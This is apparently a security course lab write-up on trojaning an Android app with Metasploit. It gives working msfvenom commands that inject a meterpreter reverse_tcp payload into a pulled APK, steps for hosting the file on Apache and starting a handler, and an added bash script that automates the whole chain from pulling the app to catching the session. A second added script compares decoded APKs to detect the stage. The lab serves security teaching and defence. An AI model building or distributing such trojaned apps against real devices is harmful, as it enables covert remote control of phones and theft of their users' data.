M 411: Trojaning an Android App with Metasploit (15 pts)

What You Need for This Project

Purpose

To use Metasploit to add Trojan code to an Android app. This is too easy :)

Task 1: Prepare the Phone

Install Firefox

On your Android device, in Google Play, install Firefox, so you have a fully functional browser.

Open Settings. Click "Apps & notifications", "App info", Firefox.

Scroll down and allow "Install unknown apps", as shown below.

Install an App to Trojan

On your Android device, in Google Play, install an app. This worked for the apps shown below on Feb 17, 2021. If you try other apps, it may or may not work; I had a success rate of 6/39 with this process. msfvenom decodes and rebuilds the app with apktool, so any app that apktool cannot rebuild cleanly will fail.

I will use USA Today for the instructions below. If you are using a different app you'll have to adjust the commands to refer to the correct app name.

You can also use my archived copy of the apps:


Task 2: Prepare the Malware with Kali

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion or Nox Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Upgrading Apktool

For this project, you need a current version of Apktool: msfvenom calls apktool to decode and rebuild the app, so an outdated version often cannot rebuild newer apps. The commands below install 2.5.0, the latest version when this project was last updated (2.4.0 was current when it was first written, on March 15, 2019).

On Kali, execute these commands:

sudo apt purge apktool -y
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.5.0.jar
mv apktool_2.5.0.jar apktool.jar
sudo mv apktool.jar /usr/bin
sudo mv apktool /usr/bin
sudo chmod +x /usr/bin/apktool*
apktool
You should see the "Apktool v2.5.0" help message, as shown below.

Pull the App from the Phone

On Kali, in a Terminal, execute these commands to find the name of the installed package, find its location, and pull it from the phone. The commands below use WhatsApp as the example; substitute the package name of the app you chose.

The commands may need some adjustment to work on your system. You need the output of each command to know what to put in the next one.

adb shell pm list packages | grep what
adb shell pm path com.whatsapp
adb pull /data/app/com.whatsapp-4ecBR8w_r7bateDGMM9YPg==/base.apk
The app should download, as shown below.

Adding Trojan Code to the App

On Kali, execute this command to see the Android payloads available in Metasploit.
msfvenom -l payloads | grep android
There are only a few payloads available, as shown below.

On Kali, execute this command to find your IP address.

ifconfig
When I did it, the address was 172.16.123.180, as shown below.

On Kali, execute this command to generate the malware, replacing the IP address with your Kali system's IP address:

msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=172.16.123.180 -f raw -o usapwned.apk
The malware is generated, as shown below.

On Kali, execute these commands to start a Web server and host your malicious app:

sudo service apache2 start
sudo cp usapwned.apk /var/www/html

Starting a C&C Server

On Kali, in a Terminal, execute these commands, to start a listener:
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp 
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444, the default LPORT for both msfvenom and the handler, as shown below.
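The steps of Task 2 can be chained so that the output of each adb command feeds the next one without retyping. The script below is an added example, not part of the original project: it assumes a Kali machine with adb, msfvenom and apache2 installed, sudo rights, and an emulator already reachable over the network. The script name, the "original.apk" intermediate file and the argument order are this example's own choices.

```bash
#!/usr/bin/env bash
# Added example, not part of the original project: automates Task 2 end to end.
# Assumes Kali with adb, msfvenom and apache2 installed, sudo rights, and an
# emulator already reachable over the network. The script name and the
# "original.apk" intermediate file are this example's own choices.
#
# Usage:   ./trojan_apk.sh <device-ip> <package-or-substring> <kali-ip> [out.apk]
# Example: ./trojan_apk.sh 172.16.123.154 com.whatsapp 172.16.123.180 usapwned.apk

# Resolve a package name from "pm list packages" output. Lines look like
# "package:com.whatsapp" (older adb builds end them with "\r", hence tr).
# An exact name wins; otherwise the substring must match exactly one package,
# so "whatsapp" is rejected when both com.whatsapp and com.whatsapp.w4b exist.
select_package() {
    pkgs=$(printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^package://p')
    exact=$(printf '%s\n' "$pkgs" | grep -ixF -- "$2" || true)
    if [ -n "$exact" ]; then
        printf '%s\n' "$exact"
        return 0
    fi
    matches=$(printf '%s\n' "$pkgs" | grep -iF -- "$2" || true)
    count=$(printf '%s\n' "$matches" | grep -c . || true)
    if [ "$count" -ne 1 ]; then
        printf 'expected one package matching "%s", got %s:\n%s\n' "$2" "$count" "$matches" >&2
        return 1
    fi
    printf '%s\n' "$matches"
}

# Pick the base APK out of "pm path <pkg>" output. Apps installed as split
# APKs also list split_*.apk files; the manifest and main code that msfvenom
# patches live in base.apk.
base_apk_path() {
    printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^package://p' | grep '/base\.apk$' | head -n 1
}

# Same msfvenom invocation as in the text; LPORT defaults to 4444, which is
# also the handler's default, so the two stay in step.
build_payload() {
    msfvenom -x "$1" -p android/meterpreter/reverse_tcp LHOST="$2" LPORT="${4:-4444}" -f raw -o "$3"
}

# Non-interactive equivalent of the msfconsole steps in the text.
start_handler() {
    msfconsole -q -x "use multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT ${1:-4444}; exploit"
}

main() {
    device="$1"; needle="$2"; lhost="$3"; out="${4:-usapwned.apk}"
    adb connect "$device" >/dev/null
    pkg=$(select_package "$(adb shell pm list packages)" "$needle")
    apk=$(base_apk_path "$(adb shell pm path "$pkg")")
    if [ -z "$apk" ]; then
        echo "no base.apk found for $pkg" >&2
        exit 1
    fi
    adb pull "$apk" original.apk
    build_payload original.apk "$lhost" "$out"
    sudo service apache2 start
    sudo cp "$out" /var/www/html/
    echo "hosted at http://$lhost/$out"
    start_handler
}

# Only run when called with arguments, so the functions can also be sourced.
if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

The package lookup deliberately refuses an ambiguous substring rather than taking the first hit, because pulling and trojaning the wrong app (for example the WhatsApp Business variant instead of WhatsApp) wastes a full rebuild cycle and the mistake is only visible after installation.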


Task 3: Installing Malware on the Phone

Removing the Genuine App

On your Android device, in Google Play, search for the app you are using.

Click UNINSTALL. Click OK.

Installing the Trojaned App

On your Android device, open Firefox and enter the IP address of your Kali machine. A default Apache page opens, as shown below.

Add the APK filename to the end of the IP address, as shown below. Your IP address will be different.

172.16.123.180/usapwned.apk
If a box pops up asking to "Allow Firefox to access photos, media...", click ALLOW.

Click Download.

Click Open.

Install the app, then open it. The meterpreter stage is started from the app's own launch code, so no session appears until the app is actually opened.


Task 4: Post-Exploitation

On Kali, you should see an open Meterpreter session, as shown below.

Flag M 411.1: Working Directory (15 pts)

In the meterpreter shell, execute this command:
pwd
The flag is the word covered by a green rectangle in the image below.

Defense: Antivirus

As on Windows, Metasploit payloads are easily detected by antivirus software. Here's Avast finding the malware.
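Antivirus is not the only way to spot this. A defender who has the genuine APK can compare it with the suspect copy after decoding both with apktool. The script below is an added example, not part of the original project: it takes two directories produced by "apktool d <apk> -o <dir>" and reports permissions that exist only in the suspect manifest (msfvenom merges the meterpreter stage's permissions into it) and smali files that reference the stage package. The "com/metasploit/stage" string is assumed to be the default stage package name and can be renamed by an attacker, so a miss on that check is inconclusive; the script name is hypothetical.

```bash
#!/usr/bin/env bash
# Added example, not part of the original project: a defender-side comparison
# of a genuine app against a suspect copy. Both APKs are first decoded with
# "apktool d <apk> -o <dir>"; this script takes the two output directories.
# Two indicators:
#  1. permissions the suspect requests that the genuine app does not, since
#     msfvenom merges the meterpreter stage's permissions into the manifest;
#  2. smali files that reference the stage package. "com/metasploit/stage"
#     is assumed to be the default package name of the Metasploit stage;
#     an attacker can rename it, so treat a miss as inconclusive.
# Usage: ./check_apk.sh <genuine-decoded-dir> <suspect-decoded-dir>

# Permission names declared in a decoded AndroidManifest.xml, sorted, one per line.
permissions_of() {
    grep -o 'uses-permission[^>]*android:name="[^"]*"' "$1/AndroidManifest.xml" \
        | sed 's/.*android:name="\([^"]*\)".*/\1/' | sort -u
}

# Permissions present in the suspect manifest but absent from the genuine one.
added_permissions() {
    genuine=$(mktemp)
    permissions_of "$1" > "$genuine" || true
    permissions_of "$2" | grep -vxF -f "$genuine" || true
    rm -f "$genuine"
}

# Number of files under a decoded directory that mention the stage package.
stage_references() {
    grep -rl 'com/metasploit/stage' "$1" 2>/dev/null | wc -l | tr -d ' '
}

# Prints findings; returns 0 when nothing was found, 1 when either indicator fired.
check_apk() {
    added=$(added_permissions "$1" "$2")
    refs=$(stage_references "$2")
    status=0
    if [ -n "$added" ]; then
        echo "permissions only in the suspect copy:"
        printf '%s\n' "$added" | sed 's/^/  /'
        status=1
    fi
    if [ "$refs" -gt 0 ]; then
        echo "$refs file(s) reference com/metasploit/stage"
        status=1
    fi
    return "$status"
}

if [ "$#" -eq 2 ]; then
    check_apk "$1" "$2"
fi
```

A third cheap check needs no decoding at all: msfvenom re-signs the rebuilt APK with its own key, so "apksigner verify --print-certs" on the Play Store copy and on the suspect copy shows different signing certificates.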

References

Lab: Hacking an Android Device with MSFvenom


Posted 3-15-19 by Sam Bowne
-y added to purge command 3-19-19
Updated 2-18-21